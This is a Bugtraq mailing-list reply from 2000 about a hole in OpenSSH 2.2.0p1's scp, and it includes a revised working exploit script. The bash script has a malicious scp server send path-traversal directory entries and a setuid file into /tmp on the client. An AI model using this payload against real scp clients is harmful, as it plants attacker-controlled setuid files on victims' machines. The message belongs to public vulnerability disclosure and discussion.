[16996] in bugtraq
Re: openssh2.2.p1 - Re: scp file transfer hole
daemon@ATHENA.MIT.EDU (Robert Bihlmeyer)
Mon Oct 2 17:46:48 2000
Mime-Version: 1.0
Content-Type: multipart/signed; boundary="----------=_970506369-1177-1";
micalg="pgp-sha1"; protocol="application/pgp-signature"
Message-Id: <87itrbb2bq.fsf@hoss.orcus.priv.at>
Date: Mon, 2 Oct 2000 19:06:01 +0200
Reply-To: Robert Bihlmeyer <robbe@ORCUS.PRIV.AT>
From: Robert Bihlmeyer <robbe@ORCUS.PRIV.AT>
X-To: Martin MaD Douda <martin@DOUDA.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: Martin MaD Douda's message of "Sun, 1 Oct 2000 12:19:46 +0200"
This is a multi-part message in MIME format.
It has been signed conforming to RFC2015.
You'll need PGP or GPG to check the signature.
------------=_970506369-1177-1
Content-Type: text/plain; charset=us-ascii
Martin MaD Douda <martin@DOUDA.NET> writes:
> Using your scripts I could make suid scpuser's file in /tmp, but probably
> due to some protocol change in scp, the file was empty and scp has died
> with "lost connection".
It worked much better for me once I removed all "of=/dev/stdout" from
the script. All dd versions that I know have stdout as default output
target, anyway. The new version created a 200 byte file alright:
--
#!/bin/bash
echo "D0755 0 ../../../../../../tmp/nope"
echo "D0755 0 ../../../../../../tmp"
echo "C4755 200 ScpIsBuggy"
dd if=/dev/urandom bs=200 count=1 2>/dev/null
dd if=/dev/zero bs=1 count=2 2>/dev/null
--
> Since openssh 2.2.0p1 is latest existing version, this vulnerability
> probably exist in every single scp version in the world.
Data Fellows/SSH Communication Security's ssh 2 uses a different file
transfer protocol. So the above exploit won't work. That doesn't mean
that there are more sanity checks, though.
--
Robbe
------------=_970506369-1177-1
Content-Type: application/pgp-signature; name="signature.ng"
Content-Disposition: inline; filename="signature.ng"
Content-Transfer-Encoding: base64
LS0tLS1CRUdJTiBQR1AgU0lHTkFUVVJFLS0tLS0KVmVyc2lvbjogR251UEcg
djEuMC4zIChHTlUvTGludXgpCkNvbW1lbnQ6IEZvciBpbmZvIHNlZSBodHRw
Oi8vd3d3LmdudXBnLm9yZwoKaUQ4REJRRTUyTUNCMzNLY3V1WllQdnNSQXJr
RkFLRFRWQStEK2o5Lzk4T2JKL0R5YzBId21zSFdaUUNmVnJYdwpaaUNGVjdz
VXEwY0ZOMHB0MkZ5VmthOD0KPUNxVFYKLS0tLS1FTkQgUEdQIFNJR05BVFVS
RS0tLS0tCg==
------------=_970506369-1177-1--
